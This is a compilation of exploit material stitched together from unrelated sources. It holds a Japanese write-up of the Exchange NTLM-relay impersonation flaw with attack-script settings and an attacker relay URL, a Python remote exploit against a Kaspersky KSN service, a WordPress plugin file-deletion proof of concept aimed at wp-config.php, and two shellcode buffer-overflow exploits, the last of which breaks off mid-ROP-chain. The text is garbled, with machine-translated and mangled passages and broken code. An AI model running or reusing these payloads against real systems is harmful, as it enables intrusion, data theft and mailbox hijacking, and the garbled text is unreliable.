"\x63\x69\x32\x7a\x36\x31\x49\x6f\x69\x70\x53\x6f\x43\x6f\x63"
"\x6a\x6e\x6b\x56\x72\x6a\x4b\x6c\x4d\x73\x6d\x52\x4a\x46\x61"
"\x4c\x4d\x4e\x65\x6e\x52\x35\x50\x63\x30\x75\x50\x70\x50\x45"
"\x38\x54\x71\x6c\x4b\x72\x4f\x4f\x77\x4b\x4f\x39\x45\x4d\x6b"
"\x6c\x30\x6d\x65\x4d\x72\x52\x76\x72\x48\x4f\x56\x4f\x65\x6d"
"\x6d\x6d\x4d\x4b\x4f\x38\x55\x47\x4c\x43\x36\x43\x4c\x46\x6a"
"\x6d\x50\x49\x6b\x4d\x30\x63\x45\x67\x75\x4f\x4b\x67\x37\x66"
"\x73\x70\x72\x70\x6f\x32\x4a\x33\x30\x72\x73\x69\x6f\x58\x55"
"\x33\x53\x50\x61\x50\x6c\x52\x43\x46\x4e\x52\x45\x33\x48\x70"
"\x65\x37\x70\x41\x41")
#lol 1337
fill = "D"*(1337 - len(calc))
buffer = junk + eip + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
0x00はじめに
これは、2018年のトップ5の興味深いケースシリーズの3番目のケースです。これらの脆弱性にはすべて、今年リリースされた約1,400のレポートとは一線を画す要因があります。今日は、認証されたユーザーがExchangeサーバー上の他のユーザーになりすませることができるExchangeの脆弱性を分析します。
ZDIのDustin Childsによる12月の投稿で、彼はExchange Server上のユーザーがそのExchangeサーバーの誰にでも偽装できるようにするExchangeの脆弱性について言及しました。この脆弱性は、イントラネットのハイジャックに使用できますが、フィッシング活動、盗むデータ、またはその他のマルウェア操作に使用される可能性が高くなります。 2018年のトップ5の興味深いケースシリーズの一環として、この記事はこのSSRF(サーバー側のリクエスト偽造)の脆弱性の詳細を掘り下げ、なりすましプロセスの実装方法を示しています。
0x01脆弱性分析
この脆弱性は、SSRFの脆弱性とその他の脆弱性の組み合わせによって引き起こされます。 Exchangeを使用すると、ユーザーはプッシュサブスクリプションに必要なURLを指定でき、サーバーはこのURLに通知を送信しようとします。問題は、Exchange ServerがScredentialCache.DefaultCredentialsを使用して接続することです。
Exchange Webサービスでは、credentientcache.defaultcredentialsがNT AuthoritySystemで実行されます。これにより、Exchangeサーバーは攻撃者のサーバーにNTLMハッシュを送信します。 Exchange Serverは、デフォルトで次のレジストリキーを設定します:hkey_local_machinesystemcurrentcontrolsetcontrollsadisableloopbackcheck=1も設定します。
これにより、HTTP認証にこれらのNTLMハッシュを使用できます。たとえば、これらのハッシュを使用してExchange Webサービス(EWS)にアクセスできます。 NT AuthoritySystemレベルで実行されるため、攻撃者はTokenserialization Rightの「特権的な」セッションを取得し、SOAPリクエストヘッダーを使用してユーザーになりすまします。
以下は、SIDS-1-5-21-4187549019-2363330540-1546371449-500を使用して管理者になりすまします。
0x02脆弱性エクスプロイト
デモンストレーションには、いくつかのPythonスクリプトを使用します。
serverhttp_relayntlm.py - インバウンド接続でntlmハッシュを取得し、ews認証
deck_ews_pushsubscribe.py - pushsubscription ewsがserverhttp_relayntlm.pyを呼び出します
これらのスクリプトはこちらからダウンロードできます。 Python-NTLMモジュールも必要です。
脆弱性の最初のステップは、私たちが偽装したいユーザーのSIDを取得することです。それを使用する1つの可能な方法は、次のとおりです。
1。認定ユーザーとしてOWAにログインします。ここでは、「攻撃者」としてログインします。
2。次に、新しいフォルダーを作成します。この例では、Temfoldを使用します。コンテキストで「許可.」オプションをクリックします。
3。ここで、あなたがなりすましたい人のメールを追加します。私たちのターゲットは犠牲者@contoso.localです:
4. F12キーを押して、ネットワークオプションを選択する必要があります。次に、新しいフォルダーのコンテキストで「許可.」オプションを選択します。
5.最初のservice.svc?action=getFolderリクエストの応答を確認する必要があります。方法を見る:
Body-responsemessages-items-0-folders-0-permissionset-permissions-n-userid-sid
この例では、nは2(最新)ですが、すべてを確認して正しいものを見つけることができます。 Primarysmtpaddressは理想的な犠牲者でなければなりません。応答にpermissionsetエントリが含まれていない場合は、別のservice.svc?action=getFolderリクエストを確認する必要があります。
6. serverhttp_relayntlm.pyでこのsidを使用して、被害者になりすまします。さらに、Exchangeサーバー上の外部接続を可能にする攻撃者制御コンピューターでブロックされる可能性が低いTCPポートを選択する必要があります。たとえば、TCPポート8080が利用可能になる場合があります。それでは、実際の情報を使用して、serverhttp_relayntlm.pyの次の行を変更しましょう。
HTTPサーバーの#port
#exch_ews_pushsubscribe.pyのevil_httpserver_urlと同じである必要があります
httpport=8080
#次の値を有効なIP/アドレス、ポート、プロトコル(「HTTP」または「HTTPS」)にEWSに置き換える必要があります
Target_ip='cusch2016.contoso.local'
Target_Port=443
proto='https'
#proto='http'
#path to ews
url='/ws/exchange.asmx'
#SMTP攻撃者のメールボックスのアドレス(被害者に送信されたすべてのメールが受信されます)
Attacker='Attacker@contoso.local'
被害者_SID='S-1-5-21-4187549019-2363330540-1546371449-2604'
スクリプトに正しい変数があると、開始できます。
7.次のステップは、deck_ews_pushsubscribe.pyスクリプトに適切な変数を設定することです。
#次の値を有効なIP/アドレス、ポート、プロトコル( 'HTTP'または 'https')に置き換える必要があります
ip='exch2016.contoso.local'
TCP_PORT=443
#proto='http'
proto='https'
#credentialsの攻撃者
user='攻撃者'
domain='contoso.local'
pass='p@ssw0rd'
url='/ws/exchange.asmx'
NTLMハッシュを使用するHTTPサーバーの#URLは、被害者のなりすましに
Evil_httpserver_url='http://192.168.50.173:8080/TEST'
それが完了したら、次のスクリプトを実行できます。
8。最後のステップ。いくつかのイベントトリガープッシュ通知が必要です。しばらく待つことができる場合、または新しい電子メールの作成や送信、新しいファイルの削除など、いくつかのことができる場合
成功した場合、Exchange ServerからServerHttp_RelayNtlm.pyへのインバウンド接続を受信する必要があります。
攻撃が成功した場合、最後の応答でupdateInboxRulesResponsEresponseClass="Success"が表示されます。これは、インバウンドルールが被害者のメールボックスに追加され、すべてのインバウンドメールが攻撃者に転送されることを意味します。
すべてが準備ができたので、それをテストする時が来ました。アカウントから被害者に電子メールを送信する必要がありますが、ソースと宛先が同じアドレスである場合、ルールが電子メールを転送しないため、新しいルール(この場合はatters@contoso.local)の宛先と同じではありません。管理者としてログインして、被害者に「敏感な」情報を送信しましょう。
攻撃者の受信トレイを確認すると、メッセージが正常に転送されていることがわかります。
ご覧のとおり、新しいメールは攻撃者に転送されます。 AddDelegateやターゲットフォルダーへの編集権限の割り当てなど、他のEWS APIを通じて同様の結果を達成できます。
0x03パッチ
Microsoftは、CVE-2018-8581に脆弱性を割り当て、11月にリリースされたときに緩和策を講じました。実際、この脆弱性はまだ修正されていません。代わりに、Microsoftは、レジストリキーを削除する必要があることを強調しています。このキーを削除して、ループバックチェックを有効にします。上記を思い出して、Exchangeサーバーには、デフォルトで次のレジストリキーが設定されています。
hkey_local_machinesystemcurrentcontrollolsetcontrollsadisableloopbackcheck=1
hkey_local_machinesystemcurrentcontrollollollsollsadisableloopbackcheckキーが削除された場合、脆弱性は不可能です。レジストリキーを削除するには、CMDウィンドウに次のコマンドを入力します。
キーを削除した後、サーバーを再起動または交換する必要はありません。この発表では、将来の交換の更新はデフォルトでレジストリキーを有効にしなくなると述べています。
0x04要約
電子メールは当社のビジネスライフのコアコンポーネントになり、Exchangeサーバーは長年にわたってホットなターゲットでした。脆弱性により、ユーザーのなりすましが可能になり、以前に報告された脆弱性を介して任意のコード実行が可能になります。これらの状況は両方とも、時には最大のセキュリティリスクが内部から来ることを示唆しています。これらの脆弱性は、外部の攻撃者が単一のエントリポイントから企業全体にどのように広がることができるかを示しています。
'''
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
# CVE: NotYet
#
# Exploit description:
# Kaspersky KSN v5.2 is prone to a remote memory corruption because it
fails to properly filter the input on the remote subscribers, this
leads to heap segments overwrite
# and it leads to remote code execution.
#
#
# Program description:
# Kaspersky KSN for Linux enables cloud-assisted, multi-layered
security for servers and workstations running the Linux operating
system. It delivers reliable protection with minimal impact on
# performance.
# Product homepage: http://kaspersky.com
#
# Example usage: python kaspersky.py 192.168.1.1 6349
#
# [!] Valgrind output:
#
# =3314== Invalid write of size 4
# ==3314== at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd
# ==3314==
# ==3314==
# ==3314== Process terminating with default action of signal 11
(SIGSEGV): dumping core
# ==3314== Access not within mapped region at address 0x0
# ==3314== at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314== If you believe this happened as a result of a stack
# ==3314== overflow in your program's main thread (unlikely but
# ==3314== possible), you can try to increase the size of the
# ==3314== main thread stack using the --main-stacksize= flag.
# ==3314== The main thread stack size used in this run was 8388608.
# ==3314==
# ==3314== HEAP SUMMARY:
# ==3314== in use at exit: 769,426 bytes in 7,522 blocks
# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534
bytes allocated
# ==3314==
# ==3314== LEAK SUMMARY:
# ==3314== definitely lost: 8 bytes in 1 blocks
# ==3314== indirectly lost: 0 bytes in 0 blocks
# ==3314== possibly lost: 5,328 bytes in 9 blocks
# ==3314== still reachable: 764,090 bytes in 7,512 blocks
# ==3314== of which reachable via heuristic:
# ==3314== newarray : 8,264 bytes in 4 blocks
# ==3314== suppressed: 0 bytes in 0 blocks
#
# [!] Debugger output:
#
# [----------------------------------registers-----------------------------------]
# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->
0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# RBX: 0x0
# RCX: 0x7f7ee2913000 --> 0x0
# RDX: 0xffffffffffdf6bf0
# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# RDI: 0x0
# RBP: 0x7f7ee28f5338 --> 0x81
# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# RIP: 0x7f7ee18b3a74
(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
mov DWORD PTR [rdi],0x1)
# R8 : 0x0
# R9 : 0x7
# R10: 0x2
# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800
# R12: 0x29b
# R13: 0x0
# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b
# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
# 0x7f7ee18b3a6e: xchg ax,ax
# 0x7f7ee18b3a70
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:
push rbx
# 0x7f7ee18b3a71
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:
mov rbx,rdi
# => 0x7f7ee18b3a74
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
mov DWORD PTR [rdi],0x1
# 0x7f7ee18b3a7a
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:
lea rdi,[rdi+0x10]
# 0x7f7ee18b3a7e
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:
call 0x7f7ee184a8a0
<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt>
# 0x7f7ee18b3a83
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:
mov BYTE PTR [rbx+0x4],0x0
# 0x7f7ee18b3a87
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:
pop rbx
# [------------------------------------stack-------------------------------------]
# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815
(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:
mov rdi,QWORD PTR [rsp+0x110])
# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd
# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045
# 0032| 0x7ffe127425e0 --> 0x361
# 0040| 0x7ffe127425e8 --> 0x0
# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->
0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)
# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# gdb-peda$ where
# #0 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) ()
# #2 0x00007f7ee189f741 in
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long
'''
import binascii
import sys
import socket
import time
def rocksDB(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Connected to:"), target, port
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Establishing connection.. ")
packet =
binascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')
# Log the packet in hexa and timestamp
fileLog = target + ".log"
logPacket = open("exploit.log", "w+")
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " -
Writing to socket: " + binascii.hexlify(bytes(packet))+"\n")
logPacket.close()
# Write bytecodes to socket
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing
to socket: ")
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print("[" + time.strftime('%a %H:%M:%S') + "]" + " -
"+ "Data received: '{msg}'".format(msg=data))
except socket.error, e:
print '[!] Sorry, No data available'
continue
s.close()
except socket.error as error:
print error
print "Sorry, something went wrong!"
def howtouse():
print "Usage: kaspersky.py hostname port"
print "[*] Mandatory arguments:"
print "[-] Specify a hostname / port"
sys.exit(-1)
if __name__ == "__main__":
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])
print "[*] Kaspersky KSN 0-Day by Juan Sacco <jsacco@exploitpack.com>"
rocksDB(target, port)
except IndexError:
howtouse()
<!--
# Exploit Title: Plugin to Wordpress Woo Import Export 1.0 RCE – Unlink
# Date: 24/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0
# Tested on: Ubuntu 16.1
1 - Description
- Type user access: any user registered.
- $_POST['file_name'] is not escaped.
Article:
*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/
Video:
*https://www.youtube.com/watch?v=pImtGeecdCk
2. Proof of Concept
-->
<form method="post"
action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
<input type="text" name="file_name" value="../../../wp-config.php">
<input type="text" name="log_id" value="aaa">
<input type="submit">
</form>
<!--
- Date Discovery : *11/25/2017*
- Date Vendor Contact : *12/29/2017*
- Date Publish : 24/04/2018
- Date Resolution :
-->
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------#
# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date : 04/24/2018 #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sharing-file.com/ #
# Software Link : http://www.sharing-file.com/efssetup.exe #
# Original Exploit: https://www.exploit-db.com/exploits/44485/ #
# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 #
#---------------------------------------------------------------------------------------------------#
import requests
import struct
import time
host='192.168.80.148'
port='80'
# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer = '\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)
# mona.py VirtualProtect() ROP template with few modifications
# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]
# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
